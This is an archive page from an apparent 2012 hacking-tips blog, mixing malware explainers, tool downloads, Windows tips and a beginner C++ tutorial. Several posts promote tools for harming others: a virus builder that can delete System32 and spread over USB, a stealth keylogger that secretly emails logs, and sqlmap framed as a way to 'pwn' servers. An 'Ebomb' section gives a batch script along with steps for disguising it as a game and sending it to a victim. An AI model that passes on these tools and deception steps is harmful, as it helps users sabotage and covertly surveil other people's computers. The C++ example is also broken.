.

.

Showing posts with label pc tps and tricks. Show all posts
Showing posts with label pc tps and tricks. Show all posts

Saturday, 3 November 2012

PC Security Threats | Malwares




Computer security threats or Malicious code or Malwares comes in a wide variety of forms and is distributed through an ever growing number of delivery mechanisms. In general malicious program is any software that impedes the normal operation of a computer or networking device. This software most often executes without the user's consent. 
Understanding how malwares works can help you develop defensive strategies, select 
computer security products and train employees on how to identify potential threats.


Types of computer security threats

These can be roughly broken down into types according to the malware's method of  operation. Anti-"virus" software, despite its name, is able to detect all of these types of malware. There are  following malware types.

  • E-mail and other types of viruses
  • Trojans and other backdoors
  • Worms
  • Blended threats
  • Time bombs
  • Spyware
  • Adware
  • Stealware
  • Zombies


when a piece of malicious code starts infecting large number of computers, it is said to be 'in wild'.

Threat level of these malwares refers to it's potential to spread and infect computers. Threat level can be shown in 4 catagories.
  1. NO -  may not function well
  2. Low - requires human assistance in replicating and moving from computer to computer
  3.  Medium - slow infection speed and little damage
  4.  High - great infection speed and do considerable damage.
wild list  or threat list refers to malicious code that is wandering around the internet infecting computers. An archive of wild lists and information about the organisation that maintains the list are available at www.wildlist.org

Make Virus using V-Maker.



Today i am going to post about a virus creating tool. This tool is Virus Matic 2010 or in short V-Maker



Main Feature of V-Maker


You can create your own prank files/viruses with ease by V-Maker.

  1. Disable Mouse and Keyboard
  2. Disable Regedit
  3. Delete System32
  4. Block Site
  5. Disable Task Manager
  6. Take Screen Shot Of Victim  PC
  7. Message Box (When User Click on Virus)
  8. Automatically Download Start (When User click on virus download start automatic)
  9. USB Spread


Download V-Maker

Block any website on your computer.







There are many people who want some website unaccessible from their computer. Most of the parents want to block some websites on their computer system. Here i am going to write a well known an easy way to do this.


Steps:

1- go to C:\WINDOWS\system32\drivers\etc
2- Find a file named "HOSTS"
3- Open this file in notepad
4- Under "127.0.0.1 localhost" Add 127.0.0.2 www.xyz.com , Now www.xyz.com site will no longer be accessable.

you can add as many url of websites under this by increasing last no. of ip 
as
127.0.0.3 www.abcxyz.com
127.0.0.4 www.xyzas.com

an so on.
To unblock these website only erase the line corresponding to that website.

Make a Ebomb(a virus)


 


Ebomb a virus for fun

This is a simple attack that enables running multiple applications in victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox


and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)



you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)"
and also you can open some websites to irritate victim eg.
start iexplore "
www.ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
(simply add them in the .bat file you created)
Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve)
and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim.
When victim will open it .............. :D

(Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "prohacks
.blogspot.com"
start firefox "
www.proshack.blogspot.com"
start notepad

start iexplore "prohacks.blogspot.com"
start firefox "
www.proshack.blogspot.com"
start notepad


and then simply save it as "anyname.bat"

Download Advanced IP Scanner




Advanced IP Scanner 2.0 Portable | 10.2 MB

Advanced IP Scanner is a fast LAN scanner for Windows. It is very easy to use and give you various types of information about local network computers in a few seconds. It gives you one-click access to many useful functions – remote shutdown and wake up, Radmin integration and more! Powered with multi-thread scan technology, this program can scan hundreds computers per second, allowing you to scan ‘C’ or even ‘B’ class network even from your modem connection.


Features of Advanced IP Scanner:
· Fast and stable multi-threaded IP scanning: You can scan hundreds of IP addresses simultaneously and with great speed – on Pentium-based machines Advanced IP Scanner scans class “B” and “C” networks in a few seconds! You can configure Advanced IP Scanner to scan in many priority levels, set number of maximum threads and so on.
· Remote shutdown: This shuts down any remote machine with NT or Win2k operating system. You can use your default access rights or specify login and password to shutdown.
· Wake-On-LAN: You can wake any machine remotely, if “Wake-on-LAN” feature is supported by your network card.
· Group operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few clicks.
· Lists of computers saving and loading: This enables you to perform operations with a specific list of computers. No problems – just save a list of machines you need and Advanced IP Scanner will load it at start up automatically.
· Radmin integration: This enables you to connect via Radmin (if it’s installed) to remote computers with just one click.

Download Advanced IP Scanner 2.0

How to protect your system from USB viruses




Autorun Virus Remover can detect and clean hundreds of usb/autorun viruses and it will block viruses and trojans trying to attack when USB device is inserted. Autorun Virus Remover provides 100% protection against any malicious programs trying to attack via USB storage(USB drive?USB stick?pen drive?flash drive?flash card?secure digital card?removable storage?portable storage?ipod?media player).

Compare Autorun Virus Remover with other antivirus solutions, you will find out its highlights: Autorun Virus Remover provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. Autorun Virus Remover can detect and clean the usb virus/worm/trojan such as Ravmon,auto.exe in your computer or usb drive,it could solve the problem that unable to open a drive by double clicking. It also removes the leftovers of virus by removing the autorun.inf files and cleaning up your system registry, so you won’t see the autoplay item anymore


Download Autorun virus Remover

SQLMAP-Automatic SQL Injection Tool



Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on theoperating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..



You Can download sqlmap 0.7 here:
Windows Portable: sqlmap-0.7_exe.zip



Enjoy !

Network Monitoring, Packet Sniffing and Analysis


Hello Friends,AthTek NetWalk Personal Edition is a robust application to help in the administration of all kinds of networks. It is particularly useful for new network administrators who wish to gain in depth knowledge about network infrastructure and management. AthTek NetWalk contains graphical representations of the network with the use of advanced packet sniffing, to help project the network state in statistical and graphical format.

After installation, you will be prompted to select a network adapter to view stats from. You can also enable capturing packets in promiscuous mode by checking the relevant checkbox. Chose an adapter and hit Ok.


Select Adapter
This will represent the overview of the network stats in a graphical user interface. This includes a monitoring dashboard, top MAC hosts pie chart, top IP hosts chart, and layered summary of application, net/transport and physical layers.

You can either click on any of the categories of the layered summary of application, net/transport and physical layers or select the Layered View option from the top left corner of the main interface (below the Overview tab below Monitoring). The layered view can be utilized to view information regarding DNS name resolution, HTTP – World Wide Web, QQ – Technet IM, ICMP Analysis, MAC hosts, VLAN, SMTP, Telnet and much more.
Layered view
You can also chose the Events option below layered View to analyze network integrity and see a map of the network via the Matrix Map option (below Events).
Matrix Map
To see a graphical representation of the network state click on the Graphs tab (below Matrix Map). From here, you can view current utilization, application layer protocol packets, ping requests and replies, TCP vs UDP, ARP requests and replies, broadcast vs multicast total, DNS (successful and failed queries), packet sizE.Graphs
AthTek NetWalk is a comprehensive network infrastructure analysis tool which helps in managing, maintaining and troubleshooting all kinds of networks. It works on Windows XP, Windows Vista, Windows 7 and Windows Server 2008.

Download AthTek NetWalk Personal Edition (Free Edition)


Enjoy !

Friday, 2 November 2012

Award keylogger Free Download


It records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. Award Keylogger can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.

Main Features:

New! Run keylogger as a Windows service
Easy-to-use, even for beginners 
Absolutely invisible/stealth mode
Logs accounts and passwords typed in the every application, (Only Award Keylogger Pro can record passwords in IE7/8/9)
Logs message typed in all instant messengers
Visual surveillance, support screenshots view 
Slide show for screenshots 
Captures the contents behind the asterisks 
Captures mouse clicks 
Logs websites visited (Award Keylogger Pro only)
Captures AOL/AIM/Yahoo/ICQ chats 
Keyword Detection and Notification 
Records contents of password protected web pages, including Web Mail messages 
Logs Windows Clipboard 
Sends log by e-mail 
Uploads ALL logs into the separate folders by FTP 
Invisible for the firewall program 
Invisible in the Windows startup list 
Monitors all users of the PC 
User friendly HTML file format for emailed logs 
Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List 
Records Windows 9.x/Me/2000/XP/VISTA logon passwords  
Intercepts DOS-box and Java-chat keystrokes 
Supports international keyboards 
External log viewer 
Supports printing of the log 
Optimized for Windows XP 
Exports log to HTML 


Download Award keylogger 

Wednesday, 31 October 2012

Hack websites and damage to a web application.




Works with Firefox: 2.0.0.8 – 3.6a1pre
Cross-Site Scripting (XSS) is a common flaw found in todays web applications. XSS flaws can cause serious damage to a web application. Detecting XSS vulnerabilities early in the development process will help protect a web application from unnecessary flaws. XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities.

XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS). It does NOT currently test for stored XSS.rnrnThe tool works by submitting your HTML forms and substituting the form value with strings that are representative of an XSS attack.rnrnIf the resulting HTML page sets a specific JavaScript value (document.vulnerable=true) then the tool marks the page as vulnerable to the given XSS string.rnrnThe tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.rnrnYou can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.

Monday, 29 October 2012

Tutorial 1:Getting started with C++.




Tutorial 1:Getting started with C++.


Hi! Friends,
Today  I have started a new program to post c++ tutorial. we will start from the root of c++.

Step -1 For starting writing our programs we need a text editor with compiler
I prefer to use turbo C++.

You can download Turbo C++ from Net.

We will Learn --
  • How to make basic program
  • How to compile a program
  • Checking error in the program
  • Increasing readability of a program
  • Types of errors 
  • What are header files
  • What are keywords
  • What are identifiers
  • What are tokens
  • For what  # is used
  • What are variables
  • What are datatypes
  • Types of datatypes
  • Fundamental and derived datatypes
  • Array in C++
  • Classes in C++
  • Loops in C++
  • Comments in C++
  • Multiple and single line comments
  • Use of clrscr( ) function
  • What are functions
  • What are escape sequences
  • Use of semicolon


        
And many more!!
******************************************************

Some Basic Definitions

·       Keywords- words which have predefined meaning is called a keyword.
·       Variables: - variables are the name storage location whose value can be changed during execution.
·       Token: -Token are the smallest individual units.



---------------------------------------------------------------------------------
Making a very simple program in C++.

# include<iostream.h>     //header file
#include<conio.h>             //another header file   
{ clrscr( );                  //use to clear the screen
  cout<<”ashutosh”;  /*cout stands for standard output device(monitor)*/
  cout<<”/n your name here”;
}


--------------------------------------------------------------------------------

Output of this program-
ashutosh
your name here

-------------------------------------------------------------------------------
What we get from the above program.

·       In the program we have used # as a preprocessor
·       Iostream.h is the header file which we have used for input/output streams
·       Conio.h is another header file which we have to use for using the function clrscr( )
·       //(double slash are used for single line comments.
·       /* is used for multiple line comments.
·       Comments are not executed by the compiler.
·       /n is the escape sequence which is used for next line.
·       ;(semicolon) is used as a statement terminator.

Friday, 26 October 2012

Download Beginning Ubuntu Linux Free






                                                      
Beginning Ubuntu Linux, Fourth Edition is the update to the best–selling book on Ubuntu, today’s
hottest Linux distribution. Targeting newcomers to Linux and to the Ubuntu distribution alike, readers
are presented with an introduction to the world of Linux and open source community, followed by a
detailed overview of Ubuntu’s installation and configuration process. From there readers learn how to
wield total control over their newly installed operating system, and are guided through common tasks
such as writing documents, listening to audio CDs and MP3s, watching movies, using VOIP and chat, and
of course general system maintenance matters.



Additionally, there’s a series of comprehensive tutorials on Linux internals and the command–line
prompt—essential for any Linux user—and the book includes special sections on optimization, security,
and system maintenance.

Forgoes introductions to esoteric Linux topics so commonly found in other books and instead focuses on
everyday tasks for everyday users: printer and file sharing configuration, office document management,
and listening to MP3s and watching movies among them.


What you’ll learn

* Use Ubuntu as a daily desktop replacement.

* Complete all manner of office tasks, such as creating Microsoft Office–compatible documents and
spreadsheets, using e–mail, and managing contacts.

* Listen to MP3s and CDs, and watch movies using a user–friendly Linux desktop.

* Configure Ubuntu’s printer– and file–sharing features to share resources seamlessly with other
computers on your network.

* Become a proficient user of the Linux command line.


Who is this book for?

Beginning Linux users seeking to explore the popular Ubuntu distribution



 Download : Beginning Ubuntu Linux


Enjoy !

Tuesday, 23 October 2012

Twek UI Tips



Press Win+L to switch to the Welcome screen.
-----
Press Win+L to lock your workstation.
-----
You can switch users without going through the Welcome screen:  From Task Manager, go to the Users tab, right-click a user, and select Connect.
-----
Hold down the shift key in the shutdown dialog to change "Stand By" to "Hibernate".  Or just press H to hibernate instantly.  You can even use the Power Control Panel to configure your power button to hibernate.
-----
To disable the password when resuming from standby or hibernation, open the Power Control Panel and uncheck "Prompt for password after returning from standby" on the Advanced tab.
-----
You can rename multiple files all at once: Select a group of files, right-click the first file, and select "Rename". Type in a name for the first file, and the rest will follow.
-----
Hold down the shift key when switching to thumbnail view to hide the file names.  Do it again to bring them back.
-----
When dragging a file in Explorer, you can control the operation that will be performed when you release the mouse button:

Hold the Control key to force a Copy.

Hold the Shift key to force a Move.

Hold the Alt key to force a Create Shortcut.
-----
If you create a file called Folder.jpg, that image will be used as the thumbnail for the folder.  What's more, that image will also be used as the album art in Windows Media Player for all media files in that folder.
-----
From the View Menu, select "Choose Details" to select which file properties should be shown in the Explorer window. To sort by a file property, check its name in the "Choose Details" in order to make that property available in the "Arrange Icons by" menu.
-----
To display the volume control icon in the taskbar, go to the Sounds and Audio Devices Control Panel and select "Place volume icon in the taskbar".
-----
Hold down the shift key when deleting a file to delete it immediately instead of placing it in the Recycle Bin. Files deleted in this way cannot be restored.
-----
If you hold down the shift key while clicking "No" in a Confirm File Operation dialog, the response will be interpreted as "No to All".
-----
To save a document with an extension other than the one a program wants to use, enclose the entire name in quotation marks.  For example, if you run Notepad and save a file under the name

Dr.Z

it will actually be saved under the name Dr.Z.txt.  But if you type

"Dr.Z"

then the document will be saved under the name Dr.Z.  Note that a document so-named cannot be opened via double-clicking since the extension is no longer ".txt".
-----
Put a shortcut to your favorite editor in your Send To folder and it will appear in your "Send To" menu. You can then right-click any file and send it to your editor.
-----
Ctrl+Shift+Escape will launch Task Manager.
-----
To arrange two windows side-by-side, switch to the first window, then hold the Control key while right-clicking the taskbar button of the second window.  Select "Tile Vertically".
-----
To close several windows at once, hold down the Control key while clicking on the taskbar buttons of each window.  Once you have selected all the windows you want to close, right-click the last button you selected and pick "Close Group".
-----
You can turn a folder into a desktop toolbar by dragging the icon of the desired folder to the edge of the screen. You can then turn it into a floating toolbar by dragging it from the edge of the screen into the middle of the screen.  (It helps if you minimize all application windows first.)
-----
You can turn a folder into a taskbar toolbar.

First, unlock your taskbar.

Next, drag the icon of the desired folder to the space between the taskbar buttons and the clock. (Wait for the no-entry cursor to change to an arrow. It's a very tiny space; you will have to hunt for it.)

You can rearrange and resize the taskbar toolbar you just created.

You can even turn the taskbar toolbar into a menu by resizing it until only its name is visible.
-----
In the Address Bar, type "microsoft" and hit Ctrl+Enter.  Internet Explorer automatically inserts the "http://www." and ".com" for you.
-----
To remove an AutoComplete entry from a Web form, highlight the item in the AutoComplete dropdown and press the Delete key.

To remove all Web form AutoComplete entries, go to the Internet Explorer Tools menu, select Internet Options, Content, AutoComplete, then press the "Clear Forms" button.
-----
To organize your Favorites in Explorer instead of using the Organize Favorites dialog, hold the shift key while selecting "Organize Favorites" from the Favorites menu of an Explorer window.
-----
You can organize your Favorites by dragging the items around your Favorites menu.

Alternatively, you can open the Favorites pane and hold the Alt key while pressing the up and down arrows to change the order of your Favorites.
-----
To run Internet Explorer fullscreen, press F11. Do it again to return to normal mode.
-----
If your "Printers and Faxes" folder is empty, you can hide the "Printers and Faxes" icon when viewed from other computers by stopping the Print Spooler service.
-----
To add or remove columns from Details mode, select Choose Details from the View menu, or just right-click the column header bar.
-----
In Internet Explorer, hold the Shift key while turning the mouse wheel to go forwards or backwards.
-----
In Internet Explorer, hold the Shift key while clicking on a link to open the Web page in a new window.
-----
In Internet Explorer, type Ctrl+D to add the current page to your Favorites.

This and many more keyboard shortcuts can be found by going to Internet Explorer, clicking the Help menu, then selecting Contents and Index.  From the table of contents, open Accessibility and click "Using Internet Explorer keyboard shortcuts".
-----
In some applications (such as Internet Explorer), holding the Control key while turning the mouse wheel will change the font size.
-----
To shut down via Remote Desktop, click the Start button, then type Alt+F4.
-----

 

Get Latest Updates: Subscribe Now | Like Us on Facebook

X